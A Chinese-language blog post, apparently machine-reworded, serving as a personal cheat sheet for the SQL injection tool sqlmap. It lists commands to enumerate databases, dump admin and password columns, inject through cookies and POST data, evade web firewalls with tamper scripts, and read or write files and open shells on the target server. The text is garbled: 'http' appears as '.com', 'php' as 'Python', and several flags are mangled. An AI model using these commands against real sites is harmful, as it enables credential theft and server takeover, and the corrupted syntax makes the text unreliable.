SQLMAP个人总结
共享,沉定,攻克。
本一篇文章纪录一下下玩sqlmap的工作经验及其指令,便捷女士们先生们及其自身今后备考查询。
Sqlmap:Sqlmap是开源系统的自动化技术SQL引入专用工具,由PHP写出。
Sqlmap基本指令:
ACCESS(1个数据库查询):
Sqlmap -u “.com://WWW.XXX.Com/shownews.asp?Id=1” – -tables (获得表)
Sqlmap -u “.com://WWW.XXX.Com/shownews.asp?Id=1” – -columns -T 表 (获得特定表字段內容)
Sqlmap -u “.com://WWW.XXX.Com/shownews.asp?Id=1” – -dump -C “admin,password” -T 表 (免费下载特定统计数据)
MYSQL(好几个数据库查询):
Sqlmap -u “.com://WWW.XXX.Com/shownews.Python?Id=1” – -dbs (获得数据库查询)
Sqlmap -u “.com://WWW.XXX.Com/shownews.asp?Id=1” – -current -sbt (获得当今网站数据库)
Sqlmap -u “.com://WWW.XXX.Com/shownews.asp?Id=1” – -tables -D “数据库查询” (获得特定数据库查询表)
Sqlmap -u “.com://WWW.XXX.Com/shownews.asp?Id=1” – -columns -T “表” -D “库” (获得特定字段名內容)
Sqlmap -u “.com://WWW.XXX.Com/shownews.asp?Id=1” – -dump -C ”admin,password” -T “表” -D “库”(免费下载特定统计数据)
Cookie引入:Sqlmap -u “.com://WWW.XXX.Com/shownews.asp?” – -cookie “Id=1” – -level 2
POST引入:
包含2个层面,-r主要参数引入 – -data主要参数引入
二者差别依据详细情况挑选
-r:用burp抓包储存为1.txt在sqlmap主目录,通常登录框运用较多
Sqlmap.py -r “1.txt”
– -data:立即运用主要参数只能
Sqlmap -u “.com://WWW.XXX.Com/shownews.asp?” – -data= “Id=1”
伪静态引入:
在存有引入的地区再加*,随后获得数据库查询
sqlmap.py -u “.com://WWW.某某.Com/index.Python/index/view/Id/50*.html语言” – -dbs
Sqlmap代理商:
.com(S)代理商:
主要参数:–proxy、–proxy-cred、–proxy-file和–ignore-proxy
应用主要参数“–proxy”来设定1个.com(S)代理商,文件格式是“.com(s)://网页地址:port”。若代理商必须验证,应用主要参数“–proxy-cred”来出示验证凭据,文件格式是“username:password”。
如:
sqlmap -u “.com://WWW.XXX.Com/shownews.asp?Id=1” – -dbs – -proxy .com://192.168.0.1:720
–proxy-file:载入代理商ip目录
如:sqlmap.py -u“.com://WWW.XXX.Com/shownews.asp?Id=1″ -proxy-file=dl.txt(代理商ip文档)
–ignore-proxy:忽视当地代理设置
–proxy .com://local:8080 –threads 12 (可以自定进程加快) 代理商
Tor代理模式:这一我没试过,也不贴英语的语法了。
Sqlmap的tamper过waf脚本制作梳理:
sqlmap拥有2个选择项 –check-waf –identify-waf 来分辨waf
注:自身常见的脚本制作
space2morehash.pyspace2hash.py(绕开过虑‘=’)base64encode.py(用base64编号替换成)
charencode.py space2comment.py charunicodeencode.py(字符串unicode编号) chardoubleencode.py(双网页地址编号)unmagicquotes.py(宽空格符绕开 GPC addslashes) randomcomments.py(用切分sql关键词) appendnullbyte.py(在合理负载完毕部位载入零字节数字符编码)
Tamper英语的语法:
batch:规定错误总体目标载入(遇到一切提醒默认设置回车键)
tamper:应用干涉脚本制作
-v 3(3为等級)
留意:若不应用3等級没法再次下一阶段实际操作。
英语的语法:sqlmap.py -u “.com://WWW.XXX.Com/shownews.asp?Id=1” -v 3 – -dbs – -batch – -tamper “space2morehash.py”
留意:mysql access等数据库查询的tamper脚本制作還是有所区别的
随身携带1个巨头梳理的每个数据库查询相匹配的tamper脚本制作连接
htpp://blog.csdn.net/hxsstar/article/details/22782627
Sqlmap之恳求延迟时间:
Sqlmap.py -u “.com://WWW.XXX.Com/shownews.asp?Id=1” – -tables – -delay 0.6(时间延迟)
假如有网址dba管理权限,且可以载入载入文档,那么可以立即Os-shell或是下列指令
– -file-read /home/WWW/index.Python 载入特定文档
– -file-write 载入当地文档(- -file-write “c:\test\1.txt” – -file-dest “/home/WWW/feizhu.txt” 当地的1.txt文档载入到远程服务器feizhu.txt(此地必须有网址载入管理权限)
sqlmap连接数据库:
sqlmap.py -d mysql://test:test@localhost:3306/test –sql-shell
或许也有许多文中沒有涉及的主要参数,事件还有机会再升级。
相关文章
- 2条评论
- 双笙晌融2022-05-29 05:06:38
- f –identify-waf 来分辨waf 注:自身常见的脚本制作 space2morehash.pyspace2hash.py(绕开过虑‘=’)base64encode.py(用base64编号替换成)charencode.py space2comment.py charunicod
- 孤央而川2022-05-29 00:59:32
- ode.py(双网页地址编号)unmagicquotes.py(宽空格符绕开 GPC addslashes) randomcomments.py(用切分sql关键词)